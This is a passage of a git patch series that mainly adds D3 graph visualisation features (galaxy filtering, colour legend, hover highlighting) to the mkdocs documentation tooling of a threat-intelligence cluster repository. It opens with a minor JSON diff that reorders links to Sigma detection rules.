"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_execution_tmp_folder.yml" ], "tags": [ @@ -100419,8 +100684,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/", "https://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/", + "https://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_usermod_susp_group.yml" ], "tags": [ @@ -100498,5 +100763,5 @@ "value": "Security Software Discovery - Linux" } ], - "version": 20240212 + "version": 20240227 } From 7fdabc9f4d1115c2066d2c20b9b2cd4f22665df3 Mon Sep 17 00:00:00 2001 From: niclas Date: Tue, 27 Feb 2024 15:08:28 +0100 Subject: [PATCH 14/49] Add [graph] galaxy filtering --- tools/mkdocs/modules/cluster.py | 8 +++---- .../docs/01_attachements/javascripts/graph.js | 24 ++++++++++++------- 2 files changed, 19 insertions(+), 13 deletions(-) diff --git a/tools/mkdocs/modules/cluster.py b/tools/mkdocs/modules/cluster.py index 2ecfde7..6229c93 100644 --- a/tools/mkdocs/modules/cluster.py +++ b/tools/mkdocs/modules/cluster.py @@ -186,8 +186,8 @@ class Cluster: output = "" output += f"## Related clusters for {self.value}\n" output += f"\n" - output += f"| Cluster A | Cluster B | Level {{ .graph }} |\n" - output += f"|-----------|-----------|-------|\n" + output += f"| Cluster A | Galaxy A | Cluster B | Galaxy B | Level {{ .graph }} |\n" + output += f"|-----------|----------|-----------|----------|-------------------|\n" for relation in relations: placeholder = "__TMP__" @@ -212,9 +212,9 @@ class Cluster: ) # Replace the placeholder with "-" if cluster_b_section != "private-cluster": - output += f"| [{relation[0].value} ({relation[0].uuid})](../../{relation[0].galaxy.json_file_name}/index.md#{cluster_a_section}) | [{relation[1].value} ({relation[1].uuid})](../../{relation[1].galaxy.json_file_name}/index.md#{cluster_b_section}) | {relation[2]} |\n" + output += f"| [{relation[0].value} ({relation[0].uuid})](../../{relation[0].galaxy.json_file_name}/index.md#{cluster_a_section}) | [{relation[0].galaxy.name}](../../{relation[0].galaxy.json_file_name}/index.md) | [{relation[1].value} ({relation[1].uuid})](../../{relation[1].galaxy.json_file_name}/index.md#{cluster_b_section}) | [{relation[1].galaxy.name}](../../{relation[1].galaxy.json_file_name}/index.md) | {relation[2]} |\n" else: - output += f"| [{relation[0].value} ({relation[0].uuid})](../../{relation[0].galaxy.json_file_name}/index.md#{cluster_a_section}) | {relation[1].value} ({relation[1].uuid}) | {relation[2]} |\n" + output += f"| [{relation[0].value} ({relation[0].uuid})](../../{relation[0].galaxy.json_file_name}/index.md#{cluster_a_section}) | [{relation[0].galaxy.name}](../../{relation[0].galaxy.json_file_name}/index.md) |{relation[1].value} ({relation[1].uuid}) | unknown | {relation[2]} |\n" return output def create_entry(self, cluster_dict, path): diff --git a/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js b/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js index 7c55c5f..2465598 100644 --- a/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js +++ b/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js @@ -13,9 +13,11 @@ document$.subscribe(function () { data.push({ source: row[1][0], sourcePath: sourcePath, - target: row[1][1], + sourceGalaxy: row[1][1], + target: row[1][2], targetPath: targetPath, - level: row[1][2] + targetGalaxy: row[1][3], + level: row[1][4] }); }); return data; @@ -28,14 +30,16 @@ document$.subscribe(function () { var cells = row.querySelectorAll("td"); var sourceAnchor = cells[0].querySelector("a"); var sourcePath = sourceAnchor ? sourceAnchor.getAttribute("href") : null; - var targetAnchor = cells[1].querySelector("a"); + var targetAnchor = cells[2].querySelector("a"); var targetPath = targetAnchor ? targetAnchor.getAttribute("href") : null; data.push({ source: cells[0].textContent, - target: cells[1].textContent, + sourceGalaxy: cells[1].textContent, + target: cells[2].textContent, + targetGalaxy: cells[3].textContent, sourcePath: sourcePath, targetPath: targetPath, - level: cells[2].textContent + level: cells[4].textContent }); } }); @@ -265,12 +269,14 @@ document$.subscribe(function () { var tf = new TableFilter(table, { base_path: "../../../../01_attachements/modules/tablefilter/", highlight_keywords: true, - col_2: "checklist", - col_widths: ["350px", "350px", "100px"], - col_types: ["string", "string", "number"], + col_1: "checklist", + col_3: "checklist", + col_4: "checklist", + col_widths: ["180px", "180px", "180px", "180px", "100px"], + col_types: ["string", "string", "string", "string", "number"], grid_layout: false, responsive: false, - watermark: ["Filter table ...", "Filter table ..."], + watermark: ["Filter table ...", "Filter table ...", "Filter table ...", "Filter table ..."], auto_filter: { delay: 100 //milliseconds }, From 8be04d62c43d9af808a0c86b10af185aec397acd Mon Sep 17 00:00:00 2001 From: niclas Date: Tue, 27 Feb 2024 15:40:34 +0100 Subject: [PATCH 15/49] fix [graph] parent node bug --- .../site/docs/01_attachements/javascripts/graph.js | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js b/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js index 2465598..ced8070 100644 --- a/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js +++ b/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js @@ -82,6 +82,8 @@ document$.subscribe(function () { path: nodePaths[id] })); + const Parent_Node = nodes[0]; + var links = data.map(d => ({ source: d.source, target: d.target })); var tooltip = d3.select("body").append("div") @@ -121,10 +123,10 @@ document$.subscribe(function () { .data(nodes) .enter().append("circle") .attr("r", function (d, i) { - return i === 0 ? NODE_RADIUS + 5 : NODE_RADIUS; + return d.id === Parent_Node.id ? NODE_RADIUS + 5 : NODE_RADIUS; }) .attr("fill", function (d, i) { - return i === 0 ? Parent_Node_COLOR : NODE_COLOR; + return d.id === Parent_Node.id ? Parent_Node_COLOR : NODE_COLOR; }); // Apply tooltip on nodes @@ -203,10 +205,10 @@ document$.subscribe(function () { .join( enter => enter.append("circle") .attr("r", function (d, i) { - return i === 0 ? NODE_RADIUS + 5 : NODE_RADIUS; + return d.id === Parent_Node.id ? NODE_RADIUS + 5 : NODE_RADIUS; }) .attr("fill", function (d, i) { - return i === 0 ? Parent_Node_COLOR : NODE_COLOR; + return d.id === Parent_Node.id ? Parent_Node_COLOR : NODE_COLOR; }), update => update, exit => exit.remove() From 0c5b9c8d20e2bfd0a45818b0312e725ca05a974d Mon Sep 17 00:00:00 2001 From: niclas Date: Wed, 28 Feb 2024 13:10:51 +0100 Subject: [PATCH 16/49] Add [graph] legend --- .../docs/01_attachements/javascripts/graph.js | 108 ++++++++++++++++-- 1 file changed, 100 insertions(+), 8 deletions(-) diff --git a/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js b/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js index ced8070..0fb97a8 100644 --- a/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js +++ b/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js @@ -1,7 +1,7 @@ document$.subscribe(function () { const NODE_RADIUS = 8; - const NODE_COLOR = "#69b3a2"; + // const NODE_COLOR = "#69b3a2"; const Parent_Node_COLOR = "#ff0000"; @@ -55,7 +55,8 @@ document$.subscribe(function () { var newNodes = Array.from(new Set(newData.flatMap(d => [d.source, d.target]))) .map(id => ({ id, - path: nodePaths[id] + path: nodePaths[id], + galaxy: newData.find(d => d.source === id) ? newData.find(d => d.source === id).sourceGalaxy : newData.find(d => d.target === id).targetGalaxy })); var newLinks = newData.map(d => ({ source: d.source, target: d.target })); @@ -76,10 +77,18 @@ document$.subscribe(function () { nodePaths[d.target] = d.targetPath || null; }); + // Extract unique galaxy names from data + const galaxies = Array.from(new Set(data.flatMap(d => [d.sourceGalaxy, d.targetGalaxy]))); + + // Create a color scale using D3's scaleOrdinal and a color scheme + const colorScale = d3.scaleOrdinal(d3.schemeTableau10) + .domain(galaxies); // Maps galaxy names to colors in the scheme + var nodes = Array.from(new Set(data.flatMap(d => [d.source, d.target]))) .map(id => ({ id, - path: nodePaths[id] + path: nodePaths[id], + galaxy: data.find(d => d.source === id) ? data.find(d => d.source === id).sourceGalaxy : data.find(d => d.target === id).targetGalaxy })); const Parent_Node = nodes[0]; @@ -102,7 +111,7 @@ document$.subscribe(function () { var simulation = d3.forceSimulation(nodes) .force("link", d3.forceLink(links).id(d => d.id).distance(linkDistance)) - .force("charge", d3.forceManyBody().strength(-50)) + .force("charge", d3.forceManyBody().strength(-30)) .force("center", d3.forceCenter(width / 2, height / 2)) .alphaDecay(0.02); // A lower value, adjust as needed @@ -126,8 +135,9 @@ document$.subscribe(function () { return d.id === Parent_Node.id ? NODE_RADIUS + 5 : NODE_RADIUS; }) .attr("fill", function (d, i) { - return d.id === Parent_Node.id ? Parent_Node_COLOR : NODE_COLOR; - }); + return d.id === Parent_Node.id ? Parent_Node_COLOR : colorScale(d.galaxy); + }) + .attr("class", d => "node galaxy-" + d.galaxy.replace(/\s+/g, '-')); // Apply tooltip on nodes node.on("mouseover", function (event, d) { @@ -178,6 +188,87 @@ document$.subscribe(function () { if (!event.active) simulation.alphaTarget(0); } + // Prepare legend data + const legendData = galaxies.map(galaxy => ({ + name: galaxy, + color: colorScale(galaxy) + })); + + const maxCharLength = 10; // Maximum number of characters to display in legend + // Create legend + const legend = svg.append("g") + .attr("class", "legend") + .attr("transform", "translate(" + (width - 100) + ",20)"); // Adjust position as needed + + // Add legend title + legend.append("text") + .attr("x", 0) + .attr("y", -10) + .style("font-size", "13px") + .style("text-anchor", "start") + .style("fill", "grey") + .text("Galaxy Colors"); + + // Add colored rectangles and text labels for each galaxy + const legendItem = legend.selectAll(".legend-item") + .data(legendData) + .enter().append("g") + .attr("class", "legend-item") + .attr("transform", (d, i) => `translate(0, ${i * 20})`); + + legendItem.append("rect") + .attr("width", 12) + .attr("height", 12) + .style("fill", d => d.color) + .on("mouseover", function (event, d) { + // Highlight all nodes associated with this galaxy + svg.selectAll(".galaxy-" + d.name.replace(/\s+/g, '-')) + .attr("r", NODE_RADIUS + 5); + tooltip.transition() + .duration(200) + .style("opacity", .9); + tooltip.html(d.name) + .style("left", (event.pageX) + "px") + .style("top", (event.pageY - 28) + "px"); + }) + .on("mouseout", function (event, d) { + // Remove highlight from all nodes + svg.selectAll(".galaxy-" + d.name.replace(/\s+/g, '-')) + .attr("r", NODE_RADIUS); + tooltip.transition() + .duration(500) + .style("opacity", 0); + }); + + legendItem.append("text") + .attr("x", 24) + .attr("y", 9) + .attr("dy", "0.35em") + .style("text-anchor", "start") + .style("fill", "grey") + .style("font-size", "12px") + // .text(d => d.name); + .text(d => d.name.length > maxCharLength ? d.name.substring(0, maxCharLength) + "..." : d.name) + .on("mouseover", function (event, d) { + // Repeat the highlight effect here for consistency + svg.selectAll(".galaxy-" + d.name.replace(/\s+/g, '-')) + .attr("r", NODE_RADIUS + 5); + tooltip.transition() + .duration(200) + .style("opacity", .9); + tooltip.html(d.name) + .style("left", (event.pageX) + "px") + .style("top", (event.pageY - 28) + "px"); + }) + .on("mouseout", function (event, d) { + svg.selectAll(".galaxy-" + d.name.replace(/\s+/g, '-')) + .attr("r", NODE_RADIUS); + tooltip.transition() + .duration(500) + .style("opacity", 0); + }); + + // Update positions on each simulation 'tick' simulation.on("tick", () => { nodes.forEach(d => { @@ -208,8 +299,9 @@ document$.subscribe(function () { return d.id === Parent_Node.id ? NODE_RADIUS + 5 : NODE_RADIUS; }) .attr("fill", function (d, i) { - return d.id === Parent_Node.id ? Parent_Node_COLOR : NODE_COLOR; - }), + return d.id === Parent_Node.id ? Parent_Node_COLOR : colorScale(d.galaxy); + }) + .attr("class", d => "node galaxy-" + d.galaxy.replace(/\s+/g, '-')), update => update, exit => exit.remove() ); From d4df918d7741c8b283a731bf5928529518cdca38 Mon Sep 17 00:00:00 2001 From: niclas Date: Wed, 28 Feb 2024 13:54:38 +0100 Subject: [PATCH 17/49] Fix [graph] replace . from galaxy class names --- .../docs/01_attachements/javascripts/graph.js | 29 ++++++++++++------- 1 file changed, 19 insertions(+), 10 deletions(-) diff --git a/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js b/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js index 0fb97a8..0add079 100644 --- a/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js +++ b/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js @@ -137,7 +137,7 @@ document$.subscribe(function () { .attr("fill", function (d, i) { return d.id === Parent_Node.id ? Parent_Node_COLOR : colorScale(d.galaxy); }) - .attr("class", d => "node galaxy-" + d.galaxy.replace(/\s+/g, '-')); + .attr("class", d => "node galaxy-" + d.galaxy.replace(/\s+/g, '-').replace(/[\s.]/g, '-')); // Apply tooltip on nodes node.on("mouseover", function (event, d) { @@ -216,13 +216,13 @@ document$.subscribe(function () { .attr("class", "legend-item") .attr("transform", (d, i) => `translate(0, ${i * 20})`); - legendItem.append("rect") + legendItem.append("rect") // change node radius info TODO .attr("width", 12) .attr("height", 12) .style("fill", d => d.color) .on("mouseover", function (event, d) { // Highlight all nodes associated with this galaxy - svg.selectAll(".galaxy-" + d.name.replace(/\s+/g, '-')) + svg.selectAll(".galaxy-" + d.name.replace(/\s+/g, '-').replace(/[\s.]/g, '-')) .attr("r", NODE_RADIUS + 5); tooltip.transition() .duration(200) @@ -233,8 +233,10 @@ document$.subscribe(function () { }) .on("mouseout", function (event, d) { // Remove highlight from all nodes - svg.selectAll(".galaxy-" + d.name.replace(/\s+/g, '-')) - .attr("r", NODE_RADIUS); + svg.selectAll(".galaxy-" + d.name.replace(/\s+/g, '-').replace(/[\s.]/g, '-')) + .attr("r", function (d, i) { + return d.id === Parent_Node.id ? NODE_RADIUS + 5 : NODE_RADIUS; + }); tooltip.transition() .duration(500) .style("opacity", 0); @@ -251,8 +253,13 @@ document$.subscribe(function () { .text(d => d.name.length > maxCharLength ? d.name.substring(0, maxCharLength) + "..." : d.name) .on("mouseover", function (event, d) { // Repeat the highlight effect here for consistency - svg.selectAll(".galaxy-" + d.name.replace(/\s+/g, '-')) - .attr("r", NODE_RADIUS + 5); + svg.selectAll(".galaxy-" + d.name.replace(/\s+/g, '-').replace(/[\s.]/g, '-')) + // .attr("r", NODE_RADIUS + 5); + .each(function () { + // 'this' refers to the individual SVG circle elements + var currentRadius = d3.select(this).attr("r"); + d3.select(this).attr("r", parseFloat(currentRadius) + 5); + }); tooltip.transition() .duration(200) .style("opacity", .9); @@ -261,8 +268,10 @@ document$.subscribe(function () { .style("top", (event.pageY - 28) + "px"); }) .on("mouseout", function (event, d) { - svg.selectAll(".galaxy-" + d.name.replace(/\s+/g, '-')) - .attr("r", NODE_RADIUS); + svg.selectAll(".galaxy-" + d.name.replace(/\s+/g, '-').replace(/[\s.]/g, '-')) + .attr("r", function (d, i) { + return d.id === Parent_Node.id ? NODE_RADIUS + 5 : NODE_RADIUS; + }); tooltip.transition() .duration(500) .style("opacity", 0); @@ -301,7 +310,7 @@ document$.subscribe(function () { .attr("fill", function (d, i) { return d.id === Parent_Node.id ? Parent_Node_COLOR : colorScale(d.galaxy); }) - .attr("class", d => "node galaxy-" + d.galaxy.replace(/\s+/g, '-')), + .attr("class", d => "node galaxy-" + d.galaxy.replace(/\s+/g, '-').replace(/[\s.]/g, '-')), update => update, exit => exit.remove() ); From 9bc289a4b11ffb0c7099eb6e1877e677b1def9f7 Mon Sep 17 00:00:00 2001 From: niclas Date: Wed, 28 Feb 2024 14:05:28 +0100 Subject: [PATCH 18/49] Add [graph] node enlargement while hovering --- .../docs/01_attachements/javascripts/graph.js | 16 ++++++++++++---- 1 file changed, 12 insertions(+), 4 deletions(-) diff --git a/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js b/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js index 0add079..a65d8e1 100644 --- a/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js +++ b/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js @@ -147,6 +147,7 @@ document$.subscribe(function () { tooltip.html(d.id) .style("left", (event.pageX) + "px") .style("top", (event.pageY - 28) + "px"); + d3.select(this).attr("r", parseFloat(d3.select(this).attr("r")) + 5); }) .on("mousemove", function (event) { tooltip.style("left", (event.pageX) + "px") @@ -156,6 +157,9 @@ document$.subscribe(function () { tooltip.transition() .duration(500) .style("opacity", 0); + d3.select(this).attr("r", function (d, i) { + return d.id === Parent_Node.id ? NODE_RADIUS + 5 : NODE_RADIUS; + }); }); // Apply links on nodes @@ -223,7 +227,10 @@ document$.subscribe(function () { .on("mouseover", function (event, d) { // Highlight all nodes associated with this galaxy svg.selectAll(".galaxy-" + d.name.replace(/\s+/g, '-').replace(/[\s.]/g, '-')) - .attr("r", NODE_RADIUS + 5); + .each(function () { + var currentRadius = d3.select(this).attr("r"); + d3.select(this).attr("r", parseFloat(currentRadius) + 5); + }); tooltip.transition() .duration(200) .style("opacity", .9); @@ -252,11 +259,8 @@ document$.subscribe(function () { // .text(d => d.name); .text(d => d.name.length > maxCharLength ? d.name.substring(0, maxCharLength) + "..." : d.name) .on("mouseover", function (event, d) { - // Repeat the highlight effect here for consistency svg.selectAll(".galaxy-" + d.name.replace(/\s+/g, '-').replace(/[\s.]/g, '-')) - // .attr("r", NODE_RADIUS + 5); .each(function () { - // 'this' refers to the individual SVG circle elements var currentRadius = d3.select(this).attr("r"); d3.select(this).attr("r", parseFloat(currentRadius) + 5); }); @@ -325,6 +329,7 @@ document$.subscribe(function () { tooltip.html(d.id) .style("left", (event.pageX) + "px") .style("top", (event.pageY - 28) + "px"); + d3.select(this).attr("r", parseFloat(d3.select(this).attr("r")) + 5); }) .on("mousemove", function (event) { tooltip.style("left", (event.pageX) + "px") @@ -334,6 +339,9 @@ document$.subscribe(function () { tooltip.transition() .duration(500) .style("opacity", 0); + d3.select(this).attr("r", function (d, i) { + return d.id === Parent_Node.id ? NODE_RADIUS + 5 : NODE_RADIUS; + }); }); // Apply links on nodes From 7ad4babe7f8ea50d75ede7b455406c1218f71a73 Mon Sep 17 00:00:00 2001 From: niclas Date: Thu, 29 Feb 2024 09:19:48 +0100 Subject: [PATCH 19/49] Add [graph] galaxy visualisation while hovering --- .../docs/01_attachements/javascripts/graph.js | 47 ++++++++++++++++--- 1 file changed, 40 insertions(+), 7 deletions(-) diff --git a/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js b/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js index a65d8e1..80b13ac 100644 --- a/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js +++ b/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js @@ -80,9 +80,30 @@ document$.subscribe(function () { // Extract unique galaxy names from data const galaxies = Array.from(new Set(data.flatMap(d => [d.sourceGalaxy, d.targetGalaxy]))); - // Create a color scale using D3's scaleOrdinal and a color scheme - const colorScale = d3.scaleOrdinal(d3.schemeTableau10) - .domain(galaxies); // Maps galaxy names to colors in the scheme + const colorScheme = [ + '#E63946', // Red + '#F1FAEE', // Off White + '#A8DADC', // Light Blue + '#457B9D', // Medium Blue + '#1D3557', // Dark Blue + '#F4A261', // Sandy Brown + '#2A9D8F', // Teal + '#E9C46A', // Saffron + '#F77F00', // Orange + '#D62828', // Dark Red + '#023E8A', // Royal Blue + '#0077B6', // Light Sea Blue + '#0096C7', // Sky Blue + '#00B4D8', // Bright Sky Blue + '#48CAE4', // Light Blue + '#90E0EF', // Powder Blue + '#ADE8F4', // Pale Cerulean + '#CAF0F8', // Blithe Blue + '#FFBA08', // Selective Yellow + '#FFD60A' // Naples Yellow + ]; + const colorScale = d3.scaleOrdinal(colorScheme) + .domain(galaxies); var nodes = Array.from(new Set(data.flatMap(d => [d.source, d.target]))) .map(id => ({ @@ -113,7 +134,7 @@ document$.subscribe(function () { .force("link", d3.forceLink(links).id(d => d.id).distance(linkDistance)) .force("charge", d3.forceManyBody().strength(-30)) .force("center", d3.forceCenter(width / 2, height / 2)) - .alphaDecay(0.02); // A lower value, adjust as needed + .alphaDecay(0.05); // A lower value, adjust as needed // Create links var link = svg.append("g") @@ -148,18 +169,24 @@ document$.subscribe(function () { .style("left", (event.pageX) + "px") .style("top", (event.pageY - 28) + "px"); d3.select(this).attr("r", parseFloat(d3.select(this).attr("r")) + 5); + svg.selectAll(".legend-text.galaxy-" + d.galaxy.replace(/\s+/g, '-').replace(/[\s.]/g, '-')) + .style("font-weight", "bold") + .style("font-size", "14px"); }) .on("mousemove", function (event) { tooltip.style("left", (event.pageX) + "px") .style("top", (event.pageY - 28) + "px"); }) - .on("mouseout", function (d) { + .on("mouseout", function (event, d) { tooltip.transition() .duration(500) .style("opacity", 0); d3.select(this).attr("r", function (d, i) { return d.id === Parent_Node.id ? NODE_RADIUS + 5 : NODE_RADIUS; }); + svg.selectAll(".legend-text.galaxy-" + d.galaxy.replace(/\s+/g, '-').replace(/[\s.]/g, '-')) + .style("font-weight", "normal") + .style("font-size", "12px"); }); // Apply links on nodes @@ -256,7 +283,7 @@ document$.subscribe(function () { .style("text-anchor", "start") .style("fill", "grey") .style("font-size", "12px") - // .text(d => d.name); + .attr("class", d => "legend-text galaxy-" + d.name.replace(/\s+/g, '-').replace(/[\s.]/g, '-')) .text(d => d.name.length > maxCharLength ? d.name.substring(0, maxCharLength) + "..." : d.name) .on("mouseover", function (event, d) { svg.selectAll(".galaxy-" + d.name.replace(/\s+/g, '-').replace(/[\s.]/g, '-')) @@ -330,18 +357,24 @@ document$.subscribe(function () { .style("left", (event.pageX) + "px") .style("top", (event.pageY - 28) + "px"); d3.select(this).attr("r", parseFloat(d3.select(this).attr("r")) + 5); + svg.selectAll(".legend-text.galaxy-" + d.galaxy.replace(/\s+/g, '-').replace(/[\s.]/g, '-')) + .style("font-weight", "bold") + .style("font-size", "14px"); }) .on("mousemove", function (event) { tooltip.style("left", (event.pageX) + "px") .style("top", (event.pageY - 28) + "px"); }) - .on("mouseout", function (d) { + .on("mouseout", function (event, d) { tooltip.transition() .duration(500) .style("opacity", 0); d3.select(this).attr("r", function (d, i) { return d.id === Parent_Node.id ? NODE_RADIUS + 5 : NODE_RADIUS; }); + svg.selectAll(".legend-text.galaxy-" + d.galaxy.replace(/\s+/g, '-').replace(/[\s.]/g, '-')) + .style("font-weight", "normal") + .style("font-size", "12px"); }); // Apply links on nodes From 34b8ce4f3cbee5f4ebc9860df898d9538fb8dff6 Mon Sep 17 00:00:00 2001 From: niclas Date: Thu, 29 Feb 2024 11:41:59 +0100 Subject: [PATCH 20/49] Add [graph] opacity adjustment --- .../docs/01_attachements/javascripts/graph.js | 62 +++++++++++++------ 1 file changed, 44 insertions(+), 18 deletions(-) diff --git a/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js b/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js index 80b13ac..226d43b 100644 --- a/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js +++ b/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js @@ -132,7 +132,7 @@ document$.subscribe(function () { var simulation = d3.forceSimulation(nodes) .force("link", d3.forceLink(links).id(d => d.id).distance(linkDistance)) - .force("charge", d3.forceManyBody().strength(-30)) + .force("charge", d3.forceManyBody().strength(-50).distanceMax(500)) .force("center", d3.forceCenter(width / 2, height / 2)) .alphaDecay(0.05); // A lower value, adjust as needed @@ -143,7 +143,7 @@ document$.subscribe(function () { .selectAll("line") .data(links) .enter().append("line") - .attr("stroke-width", d => Math.sqrt(d.value)); + .attr("stroke-width", 1); // Create nodes var node = svg.append("g") @@ -168,10 +168,19 @@ document$.subscribe(function () { tooltip.html(d.id) .style("left", (event.pageX) + "px") .style("top", (event.pageY - 28) + "px"); - d3.select(this).attr("r", parseFloat(d3.select(this).attr("r")) + 5); + node.style("opacity", 0.1); + link.style("opacity", 0.1); + d3.select(this) + .attr("r", parseFloat(d3.select(this).attr("r")) + 5) + .style("opacity", 1); svg.selectAll(".legend-text.galaxy-" + d.galaxy.replace(/\s+/g, '-').replace(/[\s.]/g, '-')) .style("font-weight", "bold") .style("font-size", "14px"); + link.filter(l => l.source.id === d.id || l.target.id === d.id) + .attr("stroke-width", 3) + .style("opacity", 1); + node.filter(n => n.id === d.id || links.some(l => (l.source.id === d.id && l.target.id === n.id) || (l.target.id === d.id && l.source.id === n.id))) + .style("opacity", 1); }) .on("mousemove", function (event) { tooltip.style("left", (event.pageX) + "px") @@ -181,14 +190,20 @@ document$.subscribe(function () { tooltip.transition() .duration(500) .style("opacity", 0); + node.style("opacity", 1); + link.style("opacity", 1); d3.select(this).attr("r", function (d, i) { return d.id === Parent_Node.id ? NODE_RADIUS + 5 : NODE_RADIUS; }); svg.selectAll(".legend-text.galaxy-" + d.galaxy.replace(/\s+/g, '-').replace(/[\s.]/g, '-')) .style("font-weight", "normal") .style("font-size", "12px"); + link.filter(l => l.source.id === d.id || l.target.id === d.id) + .attr("stroke-width", 1); + node.filter(n => n.id === d.id || links.some(l => (l.source.id === d.id && l.target.id === n.id) || (l.target.id === d.id && l.source.id === n.id))) }); + // Apply links on nodes node.on("dblclick", function (event, d) { location.href = d.path; @@ -247,16 +262,17 @@ document$.subscribe(function () { .attr("class", "legend-item") .attr("transform", (d, i) => `translate(0, ${i * 20})`); - legendItem.append("rect") // change node radius info TODO + legendItem.append("rect") .attr("width", 12) .attr("height", 12) .style("fill", d => d.color) .on("mouseover", function (event, d) { - // Highlight all nodes associated with this galaxy + node.style("opacity", 0.1); + link.style("opacity", 0.1); svg.selectAll(".galaxy-" + d.name.replace(/\s+/g, '-').replace(/[\s.]/g, '-')) .each(function () { var currentRadius = d3.select(this).attr("r"); - d3.select(this).attr("r", parseFloat(currentRadius) + 5); + d3.select(this).style("opacity", 1); }); tooltip.transition() .duration(200) @@ -266,11 +282,8 @@ document$.subscribe(function () { .style("top", (event.pageY - 28) + "px"); }) .on("mouseout", function (event, d) { - // Remove highlight from all nodes - svg.selectAll(".galaxy-" + d.name.replace(/\s+/g, '-').replace(/[\s.]/g, '-')) - .attr("r", function (d, i) { - return d.id === Parent_Node.id ? NODE_RADIUS + 5 : NODE_RADIUS; - }); + node.style("opacity", 1); + link.style("opacity", 1); tooltip.transition() .duration(500) .style("opacity", 0); @@ -286,10 +299,11 @@ document$.subscribe(function () { .attr("class", d => "legend-text galaxy-" + d.name.replace(/\s+/g, '-').replace(/[\s.]/g, '-')) .text(d => d.name.length > maxCharLength ? d.name.substring(0, maxCharLength) + "..." : d.name) .on("mouseover", function (event, d) { + node.style("opacity", 0.1); + link.style("opacity", 0.1); svg.selectAll(".galaxy-" + d.name.replace(/\s+/g, '-').replace(/[\s.]/g, '-')) .each(function () { - var currentRadius = d3.select(this).attr("r"); - d3.select(this).attr("r", parseFloat(currentRadius) + 5); + d3.select(this).style("opacity", 1); }); tooltip.transition() .duration(200) @@ -299,10 +313,8 @@ document$.subscribe(function () { .style("top", (event.pageY - 28) + "px"); }) .on("mouseout", function (event, d) { - svg.selectAll(".galaxy-" + d.name.replace(/\s+/g, '-').replace(/[\s.]/g, '-')) - .attr("r", function (d, i) { - return d.id === Parent_Node.id ? NODE_RADIUS + 5 : NODE_RADIUS; - }); + node.style("opacity", 1); + link.style("opacity", 1); tooltip.transition() .duration(500) .style("opacity", 0); @@ -356,10 +368,19 @@ document$.subscribe(function () { tooltip.html(d.id) .style("left", (event.pageX) + "px") .style("top", (event.pageY - 28) + "px"); - d3.select(this).attr("r", parseFloat(d3.select(this).attr("r")) + 5); + node.style("opacity", 0.1); + link.style("opacity", 0.1); + d3.select(this) + .attr("r", parseFloat(d3.select(this).attr("r")) + 5) + .style("opacity", 1); svg.selectAll(".legend-text.galaxy-" + d.galaxy.replace(/\s+/g, '-').replace(/[\s.]/g, '-')) .style("font-weight", "bold") .style("font-size", "14px"); + link.filter(l => l.source.id === d.id || l.target.id === d.id) + .attr("stroke-width", 3) + .style("opacity", 1); + node.filter(n => n.id === d.id || links.some(l => (l.source.id === d.id && l.target.id === n.id) || (l.target.id === d.id && l.source.id === n.id))) + .style("opacity", 1); }) .on("mousemove", function (event) { tooltip.style("left", (event.pageX) + "px") @@ -369,12 +390,17 @@ document$.subscribe(function () { tooltip.transition() .duration(500) .style("opacity", 0); + node.style("opacity", 1); + link.style("opacity", 1); d3.select(this).attr("r", function (d, i) { return d.id === Parent_Node.id ? NODE_RADIUS + 5 : NODE_RADIUS; }); svg.selectAll(".legend-text.galaxy-" + d.galaxy.replace(/\s+/g, '-').replace(/[\s.]/g, '-')) .style("font-weight", "normal") .style("font-size", "12px"); + link.filter(l => l.source.id === d.id || l.target.id === d.id) + .attr("stroke-width", 1); + node.filter(n => n.id === d.id || links.some(l => (l.source.id === d.id && l.target.id === n.id) || (l.target.id === d.id && l.source.id === n.id))) }); // Apply links on nodes From 7ff99f520167c215b5b022fad7ca94b50199e383 Mon Sep 17 00:00:00 2001 From: niclas Date: Thu, 29 Feb 2024 16:30:18 +0100 Subject: [PATCH 21/49] Add [graph] pre filtering for large data --- .../docs/01_attachements/javascripts/graph.js | 18 ++++++++++++++++-- 1 file changed, 16 insertions(+), 2 deletions(-) diff --git a/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js b/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js index 226d43b..cffb5ba 100644 --- a/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js +++ b/tools/mkdocs/site/docs/01_attachements/javascripts/graph.js @@ -5,6 +5,12 @@ document$.subscribe(function () { const Parent_Node_COLOR = "#ff0000"; + function applyTableFilter(tf) { + var valuesToSelect = ['1', '2', '3']; + tf.setFilterValue(4, valuesToSelect); + tf.filter(); + }; + function 